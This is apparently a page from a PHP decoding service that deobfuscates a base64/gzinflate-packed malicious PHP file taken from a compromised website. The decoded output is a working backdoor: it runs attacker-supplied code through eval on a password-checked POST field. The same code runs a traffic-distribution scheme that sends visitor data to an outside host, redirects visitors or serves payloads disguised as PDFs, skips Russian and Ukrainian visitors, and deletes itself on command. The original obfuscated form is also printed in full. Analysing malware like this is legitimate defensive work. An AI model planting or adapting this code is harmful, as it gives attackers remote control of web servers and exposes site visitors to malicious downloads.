Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(base64_decode("rVZ7T+NGENepMgRaBQm4UASHOYgOr+/YXOy1vdbG3g/Bn1UbAknsxL..
Decoded Output download
?><?php function err() { header("HTTP/1.1 404 Not Found"); header("Status: 404 Not Found"); echo "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">
" ."<html><head>
" ."<title>404 Not Found</title>
" ."</head><body>
" ."<h1>Not Found</h1>
" ."<p>The requested URL ".$_SERVER['REQUEST_URI']." was not found on this server.</p>
" ."</body></html>"; die(); } if ((strstr($_SERVER['HTTP_ACCEPT_LANGUAGE'],'ru'))||(strstr($_SERVER['HTTP_ACCEPT_LANGUAGE'],'ua'))) err(); if (isset($_GET[p])) { $_GET[p]=$_GET[p]; $_GET[p]=str_replace('.pdf','',$_GET[p]); $rr='n'; $shab='ee26e3'; $obkey=''; $shabkey='1'; $column='1'; $pack='3'; $track=$_SERVER['SERVER_NAME']; $bot=0; if ((isset($_POST[pass]))&(md5($_POST[pass])=='8d2c73ca32187f23fde7f1cb499e8f01')) { eval(stripslashes($_POST[cmd])); die(); }; if (strstr($_SERVER['HTTP_REFERER'],'google')) { $rr='g'; }; if (strstr($_SERVER['HTTP_REFERER'],'yahoo')) { $rr='y'; }; if (strstr($_SERVER['HTTP_REFERER'],'bing')) { $rr='m'; }; if (strstr($_SERVER['HTTP_USER_AGENT'] ,'google')) {$bot=1;} ; if (strstr($_SERVER['HTTP_USER_AGENT'] ,'bot')) {$bot=1;} ; $url1 = 'http://www.uimei.jp/infoblog/2008/12/tds2/?p='.$_GET[p].'&niche=ed2&target=0&ff=p&ss=jan&ip='.$_SERVER['REMOTE_ADDR'].'&rr='.$rr.'&shab='.$shab.'&bot='.$bot.'&host='.$_SERVER['HTTP_HOST'].'&obkey='.$obkey.'&shabkey='.$shabkey.'&pdf=1'.'&column='.$column.'&track='.$track.'&pack='.$pack; $url=file_get_contents($url1); if (strstr($_SERVER['HTTP_REFERER'],'site')) err(); if ($url=='404') err(); if ($url=='block') unlink(__FILE__); if (strlen($url)<1000) header("Location: {$url}"); else { Header('Content-Type: application/octet-stream'); Header('Accept-Ranges: bytes'); Header('Content-Length: '.strlen($url)); Header('Content-disposition: attachment; filename='.$_GET[p].'.pdf'); die($url); } } ?>
Did this file decode correctly?
Original Code
<?php eval(gzinflate(base64_decode("rVZ7T+NGENepMgRaBQm4UASHOYgOr+/YXOy1vdbG3g/Bn1UbAknsxLzkB4Qty2fvrO2Eo6XcURVFeGd25jfP3dl2Qka0e0/6OSUxJQOX5h7pEy+j/jntpmRCyQ0luUv7HpmU7D45pySl5N6lNx7JiTei/pCSwP/K2intjijJXHpNvIKkSnLUP/dA3L8HnG4OxsiwD+xrlw49MiJecDAemZYpRK9DfGw7RHDDSDPxUVichdxIZ+vN5mqR5Im4ml6JTQeLXadDwlk2WEisYIY76PSfAty3HDEb/7n3frv506ou1ptbLbG69mtrY1ssze6KYkNv7hbFXnOv2orzaVHom0uz4RKZiXw2trDnDsfKzpyDbezy4TNL46Ji1hJFKT6mTni4gEmG30gDVfPNYdPiwuCfOxxhHoq1RkvM8kdtRW/8ojfeyYb+85q+0tTWGhtyOZ+JY4YEAaCeAhKQK2zZSCBufOFGPi7MhQulcbCk3J8NRGjzFNJxJITdE2mKsAG/9MmOSrG2s72trza11s7mh7WdD7pcvpVGR2bZp08/rtBhoJBVJRyIypyNEMeg+0FvvjOXYVdAcdXfnBXNFwNxsuCBPc3gpst8nsrcDHvyVsrbBcqgQjCMSBJZE8hiNJKcxxd8IhWWQ7v8MJLlWm2WVKLETx59x+14pCJPHk3mdyNZaWFDEU+xVl9tc2cLQqxNUQdHUxAu0zkPcPX9CvjGEIIgH1IvvH7OiyJ5Fsb+5cRnkzg5u+zFk17IL3uJT6/Oz/lZb5pIlZ2Pgn9hrsq5bSKXIYujOZDvhYD9VM/KG+XEyxVq6Lt6Q2+oygSOE7hcGfhYpS2QbwM4ZJbj1A6WAIdvBKA2CUr9BYL3IwhrQGnQXptNuSyexVFWIRlAV78RA/ReBHjsGG4iIiEtjM3Tojg+Ps47tsft/KtZ2KTnUNcJing6PSuSuMAhiouRGcl83pW5fCC2b/GIh/EDZkbAoUseer3IfEAo+srIg12JP53vrfdNXdvZ24MMgbZKSg6pgWXVzHnZt0AqT4GCDxCWg/AznDLIdeiQEqVu+7zq/xqrZtVLYMKRihIJi/lJyOszAazqCACnXCjhmlbfp1xFPdvlGkSp+Q7BnGBoVJXCrD4Z320JZOOylPV9USqVwJGEG1a+uAE18Luw1SGuTbqppu1utHRNy571gMtJKZ+Nk+l0mi0mRcvxmRoyp1B82D6a1WrcRRxuBWjMEyHWK2G5XQV11zw0+algpunalXbh+JjjO7DDmSeVf09KO77PTXzXYCTgMJLoIebobyJz3BYnAbZOhcy/9fhl2dBGpgPpKn1nGDPf8oA/EKoEhHn8WRuW92UFpK6KErcKVM0A9W80PGDtDMY3TPKJR66oH/WvabcoZ/0NTG9YUD/4LxOdtS+oD98rT2HFAEvGSiAl97R7U74YPKUCmKAKeCTI8vRidGV83yHE2vDcuPXIgJKL/g2JyQ1AdxWQS9Vr4uiIja9Tox2Dhkvh9XJLuwNyCR+SgXfUvwzgnfLvu703O/8a2ufP6HV/93Gwfx6nxnU6/IHof3vF1O9o/4/99v/1mkNsdDu4MA54eIBfjwAfHCD2Fw=="))); ?>
Function Calls
| chr | 1911 |
| ord | 1911 |
| strlen | 1 |
| gzinflate | 1 |
| base64_decode | 1 |
Stats
| MD5 | 82c9a3c6af4f8d4a848bfec2f7555f54 |
| Eval Count | 2 |
| Decode Time | 6181 ms |